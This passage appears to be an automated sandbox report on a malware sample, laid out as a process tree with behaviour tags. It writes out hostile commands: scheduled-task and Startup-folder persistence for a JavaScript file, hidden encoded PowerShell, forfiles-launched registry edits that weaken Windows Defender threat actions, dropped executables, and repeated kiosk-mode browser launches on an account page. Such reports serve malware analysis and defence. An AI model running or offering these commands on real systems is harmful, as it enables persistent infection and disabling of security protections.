                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1736.2.356678929\435909298" -childID 1 -isForBrowser -prefsHandle 1932 -prefMapHandle 1928 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b762d8f8-3816-4df9-b5d2-c96da1e5b5e7} 1736 "\\.\pipe\gecko-crash-server-pipe.1736" 1944 19677e58 tab
                                              7⤵
                                                PID:2556
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1736.3.843275607\1014894529" -childID 2 -isForBrowser -prefsHandle 2700 -prefMapHandle 2696 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3b8f4791-a2ae-4447-bc79-f6c1dc323cf0} 1736 "\\.\pipe\gecko-crash-server-pipe.1736" 2712 1b28a058 tab
                                                7⤵
                                                  PID:2168
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1736.4.1956237149\1692773656" -childID 3 -isForBrowser -prefsHandle 3852 -prefMapHandle 3824 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c498a5eb-5705-4ff2-a4f1-e0c14df2028d} 1736 "\\.\pipe\gecko-crash-server-pipe.1736" 3864 2164a358 tab
                                                  7⤵
                                                    PID:3812
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1736.5.548930202\1297317736" -childID 4 -isForBrowser -prefsHandle 3880 -prefMapHandle 3876 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6c89bf48-53dd-44ca-afd6-8d84c7c344b6} 1736 "\\.\pipe\gecko-crash-server-pipe.1736" 3896 216b0858 tab
                                                    7⤵
                                                      PID:3820
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1736.6.1848074152\1489997082" -childID 5 -isForBrowser -prefsHandle 3900 -prefMapHandle 3896 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f5ff5da-b90a-44cd-8005-d29e8bca009e} 1736 "\\.\pipe\gecko-crash-server-pipe.1736" 4056 216b1458 tab
                                                      7⤵
                                                        PID:3828
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                    5⤵
                                                      PID:1724
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                      5⤵
                                                        PID:3556
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                          6⤵
                                                          • Checks processor information in registry
                                                          • Modifies registry class
                                                          PID:4056
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4056.0.1410253027\197933064" -parentBuildID 20221007134813 -prefsHandle 1208 -prefMapHandle 1188 -prefsLen 21788 -prefMapSize 233836 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0614ad2f-a40b-436d-8ed6-db1a0a7550b2} 4056 "\\.\pipe\gecko-crash-server-pipe.4056" 1320 11ff9a58 gpu
                                                            7⤵
                                                              PID:3404
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4056.1.9053361\1968558638" -parentBuildID 20221007134813 -prefsHandle 1468 -prefMapHandle 1448 -prefsLen 22649 -prefMapSize 233836 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a9c1348-2283-4c08-bfbf-625456d519a4} 4056 "\\.\pipe\gecko-crash-server-pipe.4056" 1492 f4d1a58 socket
                                                              7⤵
                                                                PID:3316
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4056.2.1263317880\1424712823" -childID 1 -isForBrowser -prefsHandle 1692 -prefMapHandle 1908 -prefsLen 22752 -prefMapSize 233836 -jsInitHandle 788 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {83474e76-4cf0-4125-935c-1479226de671} 4056 "\\.\pipe\gecko-crash-server-pipe.4056" 2020 1a551558 tab
                                                                7⤵
                                                                  PID:3660
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4056.3.884054096\280053871" -childID 2 -isForBrowser -prefsHandle 2660 -prefMapHandle 2656 -prefsLen 27100 -prefMapSize 233836 -jsInitHandle 788 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {37ff9ad1-5782-400c-93d6-c258300e4e4d} 4056 "\\.\pipe\gecko-crash-server-pipe.4056" 2672 1eecef58 tab
                                                                  7⤵
                                                                    PID:2676
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4056.4.1309012546\1476245711" -childID 3 -isForBrowser -prefsHandle 3368 -prefMapHandle 3364 -prefsLen 27100 -prefMapSize 233836 -jsInitHandle 788 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fbb423be-b34c-4e2f-b5dd-ee367da4a704} 4056 "\\.\pipe\gecko-crash-server-pipe.4056" 3380 20589458 tab
                                                                    7⤵
                                                                      PID:2460
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4056.5.334643813\1386840783" -childID 4 -isForBrowser -prefsHandle 3492 -prefMapHandle 3496 -prefsLen 27100 -prefMapSize 233836 -jsInitHandle 788 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b2ad8ab-8b5e-4b10-b354-0067f52920a1} 4056 "\\.\pipe\gecko-crash-server-pipe.4056" 3484 2058b858 tab
                                                                      7⤵
                                                                        PID:1712
                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4056.6.963231457\757292890" -childID 5 -isForBrowser -prefsHandle 3648 -prefMapHandle 3652 -prefsLen 27100 -prefMapSize 233836 -jsInitHandle 788 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ad853f8-6ec2-478d-ad77-9e33e2f220ed} 4056 "\\.\pipe\gecko-crash-server-pipe.4056" 3636 2058a058 tab
                                                                        7⤵
                                                                          PID:3040
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                      5⤵
                                                                        PID:2436
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                          6⤵
                                                                            PID:2808
                                                                      • C:\Users\Admin\AppData\Local\Temp\1000310001\shopfree.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\1000310001\shopfree.exe"
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        PID:3268
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /c schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                                                    2⤵
                                                                      PID:2232
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Scheduled Task/Job: Scheduled Task
                                                                        PID:1980
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & echo URL="C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & exit
                                                                      2⤵
                                                                      • Drops startup file
                                                                      PID:1924
                                                                  • C:\Windows\system32\conhost.exe
                                                                    \??\C:\Windows\system32\conhost.exe "1860326853315173221-9893846201296004950-2031704601-523111407-305005525718658316"
                                                                    1⤵
                                                                      PID:2064
                                                                    • C:\Windows\system32\conhost.exe
                                                                      \??\C:\Windows\system32\conhost.exe "-16809041611581379067208155448879312432-1817905267-1880717455811299242989564293"
                                                                      1⤵
                                                                        PID:2996
                                                                      • C:\Windows\system32\DllHost.exe
                                                                        C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                        1⤵
                                                                          PID:1696
                                                                        • C:\Windows\system32\taskeng.exe
                                                                          taskeng.exe {562D4183-01D8-4BDF-A699-0E7911F345FB} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]
                                                                          1⤵
                                                                            PID:3696
                                                                            • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:3836
                                                                            • C:\ProgramData\explorer.exe
                                                                              C:\ProgramData\explorer.exe
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:3912
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                              2⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Drops file in System32 directory
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:588
                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                3⤵
                                                                                  PID:4052
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                2⤵
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                • Drops file in System32 directory
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:1268
                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                  3⤵
                                                                                    PID:2460
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                  2⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  • Drops file in System32 directory
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:4016
                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                    3⤵
                                                                                      PID:2348
                                                                                  • C:\ProgramData\explorer.exe
                                                                                    C:\ProgramData\explorer.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:2444
                                                                                  • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    PID:3596
                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                    2⤵
                                                                                      PID:3844
                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                        3⤵
                                                                                        • Checks processor information in registry
                                                                                        • Modifies registry class
                                                                                        PID:4080
                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4080.0.39839404\1306240455" -parentBuildID 20221007134813 -prefsHandle 1164 -prefMapHandle 1156 -prefsLen 21972 -prefMapSize 234060 -appDir "C:\Program Files\Mozilla Firefox\browser" - {195ec580-f727-41e4-b09c-28ab4202c42c} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" 1232 10582758 gpu
                                                                                          4⤵
                                                                                            PID:3916
                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4080.1.577558534\1646355702" -parentBuildID 20221007134813 -prefsHandle 1408 -prefMapHandle 1404 -prefsLen 22053 -prefMapSize 234060 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a4cb53f6-1e08-452a-b698-6d7e3fc8665c} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" 1436 41d5858 socket
                                                                                            4⤵
                                                                                              PID:1580
                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4080.2.570142278\2074355284" -childID 1 -isForBrowser -prefsHandle 1060 -prefMapHandle 1908 -prefsLen 22156 -prefMapSize 234060 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cab57861-5b9a-4635-8b69-ef62d04028c1} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" 1796 1b05d258 tab
                                                                                              4⤵
                                                                                                PID:2896
                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4080.3.306117571\772367322" -childID 2 -isForBrowser -prefsHandle 2536 -prefMapHandle 2532 -prefsLen 26505 -prefMapSize 234060 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {563f90e0-43c5-4dea-98df-e6832f7edcef} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" 2548 e68a58 tab
                                                                                                4⤵
                                                                                                  PID:3524
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4080.4.520740656\357335492" -childID 3 -isForBrowser -prefsHandle 3052 -prefMapHandle 3048 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0474db23-3a84-472c-b554-095db71ae9dd} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" 3064 1f2a5e58 tab
                                                                                                  4⤵
                                                                                                    PID:1872
                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4080.5.131752974\1709991114" -childID 4 -isForBrowser -prefsHandle 3364 -prefMapHandle 3368 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc64ce40-1e64-48b5-b3db-0aee6e3d0f6d} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" 3400 18ad0458 tab
                                                                                                    4⤵
                                                                                                      PID:2560
                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4080.6.621446848\717441789" -childID 5 -isForBrowser -prefsHandle 3928 -prefMapHandle 3572 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {50f80e7d-76f8-4aae-bff7-6c7e0d95a290} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" 3936 22958858 tab
                                                                                                      4⤵
                                                                                                        PID:2264
                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4080.7.1428436230\1703596290" -childID 6 -isForBrowser -prefsHandle 4056 -prefMapHandle 4060 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fe2e0070-caf1-4eed-aea9-e46985f5a1d9} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" 4044 22956758 tab
                                                                                                        4⤵
                                                                                                          PID:3824
                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4080.8.397621081\965220214" -childID 7 -isForBrowser -prefsHandle 4224 -prefMapHandle 4228 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5fac5dd2-6018-489c-9743-6b3df67e4c74} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" 4212 2395d558 tab
                                                                                                          4⤵
                                                                                                            PID:2704
                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4080.9.1246773744\908675822" -childID 8 -isForBrowser -prefsHandle 4084 -prefMapHandle 4120 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bbee5ca6-c02a-4eee-99ec-010aad231619} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" 3572 e63858 tab
                                                                                                            4⤵
                                                                                                              PID:3632
                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4080.10.766066620\2050139219" -childID 9 -isForBrowser -prefsHandle 4084 -prefMapHandle 3060 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {90a4acaf-8e7b-43e5-8008-11ded054c70d} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" 3952 1f2a5e58 tab
                                                                                                              4⤵
                                                                                                                PID:3076
                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4080.11.1776598879\1754954761" -childID 10 -isForBrowser -prefsHandle 3984 -prefMapHandle 3952 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9b5434cf-2e08-41c5-97b9-28ecc17530f2} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" 4012 22956758 tab
                                                                                                                4⤵
                                                                                                                  PID:2328
                                                                                                            • C:\ProgramData\explorer.exe
                                                                                                              C:\ProgramData\explorer.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:2532
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:3336
                                                                                                            • C:\ProgramData\explorer.exe
                                                                                                              C:\ProgramData\explorer.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:600
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:3684
                                                                                                          • C:\Windows\system32\taskeng.exe
                                                                                                            taskeng.exe {4B3424F2-0CF2-41F6-ACC1-CD4745398B7C} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                            1⤵
                                                                                                              PID:3776
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\FPqDmOv.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\FPqDmOv.exe PV /BodHdidekNb 385121 /S
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Drops file in System32 directory
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                PID:3896
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                  3⤵
                                                                                                                    PID:3980
                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                      4⤵
                                                                                                                      • Indirect Command Execution
                                                                                                                      PID:1924
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                        5⤵
                                                                                                                          PID:1584
                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                            6⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:3552
                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                        4⤵
                                                                                                                        • Indirect Command Execution
                                                                                                                        PID:3532
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                          5⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:3596
                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                            6⤵
                                                                                                                              PID:3372
                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                          4⤵
                                                                                                                          • Indirect Command Execution
                                                                                                                          PID:3916
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                            5⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:3972
                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                              6⤵
                                                                                                                                PID:3992
                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                            4⤵
                                                                                                                            • Indirect Command Execution
                                                                                                                            PID:4052
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                              5⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:4016
                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                6⤵
                                                                                                                                  PID:4032
                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                              4⤵
                                                                                                                              • Indirect Command Execution
                                                                                                                              PID:3840
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                5⤵
                                                                                                                                  PID:2712
                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                    6⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    • Drops file in System32 directory
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:3268
                                                                                                                                    • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                      7⤵
                                                                                                                                        PID:1680
                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
